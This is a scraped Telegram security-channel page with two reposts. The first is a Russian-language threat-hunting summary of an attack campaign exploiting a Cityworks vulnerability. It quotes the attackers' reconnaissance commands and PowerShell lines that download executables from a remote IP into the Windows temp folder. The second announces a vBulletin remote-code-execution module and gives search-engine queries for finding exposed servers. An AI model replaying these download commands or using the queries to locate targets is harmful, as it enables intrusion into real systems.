Fsecurity | HH
Відкрити в Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Показати більше2 017
Підписники
-224 години
+27 днів
-1230 день
Архів дописів
2 017
Repost from Threat Hunting Father 🦔
+2
⚙️ Кампания UAT-6382: эксплуатация 0-day в Cityworks
Cisco Talos выявила серию атак от группы UAT-6382, использующей 0-day уязвимость CVE-2025-0994 (deserialization RCE) в платформе Cityworks, применяемой органами местного самоуправления США.
🧰 Инструментарий
🔸 WebShells
AntSword, Chopper (chinatso), Behinder — размещаются в
inetpub\wwwroot, используются как бэкдоры.
🔸 TetraLoader (загрузчик на Rust)
Скомпилирован с использованием MaLoader — malware-билдера.
Распаковывает shellcode и внедряет его в легитимные процессы (`notepad.exe`, dllhost.exe, gpupdate.exe`) через `NtMapViewOfSection, RtlCreateUserThread и др.
🔸 Payloads
Cobalt Strike Beacons — используют HTTPS C2 (например, cdn[.]lgaircon[.]xyz`) и маскируются под .js`-запросы.
VShell — легкий RAT на Go: команды, прокси, скриншоты, файловые операции. Панель управления преимущественно на китайском.
🔎 Hunting Notes
🔹 Обнаруженные команды:
cmd.exe /c ipconfig
cmd.exe /c pwd
cmd.exe /c dir
cmd.exe /c dir ..
cmd.exe /c dir c:\
cmd.exe /c dir c:\inetpub
cmd.exe /c tasklist
cmd.exe /c dir c:\inetpub\wwwroot
cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite
cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite\Assets
cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\
cmd.exe /c copy c:\inetpub\wwwroot\CityworksServer\<backup_archives> c:\inetpub\wwwroot\CityworksServer\Uploads\
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/LVLWPH.exe' -OutFile '<путь>\LVLWPH.exe'
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/MCUCAT.exe' -OutFile 'C:\windows\temp\z1.exe'
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/TJPLYT.exe' -OutFile 'C:\windows\temp\z33.exe'
powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/z44.exe' -OutFile 'C:\windows\temp\z44.exe'
🔹 Что ещё искать:
PowerShell с Invoke-WebRequest к IP-адресам
Размещение ASP/ASPX файлов в inetpub\wwwroot
Инъекции в dllhost.exe, gpupdate.exe, notepad.exe
C2-домены
Запросы к URI вроде /jquery-3.3.1.min.js, /owa/... — подделка под легитимный JS-трафик
Rust-бинарники со встроенным shellcode и артефактами MaLoader
🔗https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/
🦔 THF2 017
Repost from 1N73LL1G3NC3
Unauthenticated RCE module for vBulletin 5.1.0-6.0.3
Write-up: https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
Search query:
ZoomEye: app="vBulletin" Shodan: http.html:"content=\"vBulletin" FOFA: app="vBulletin"
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
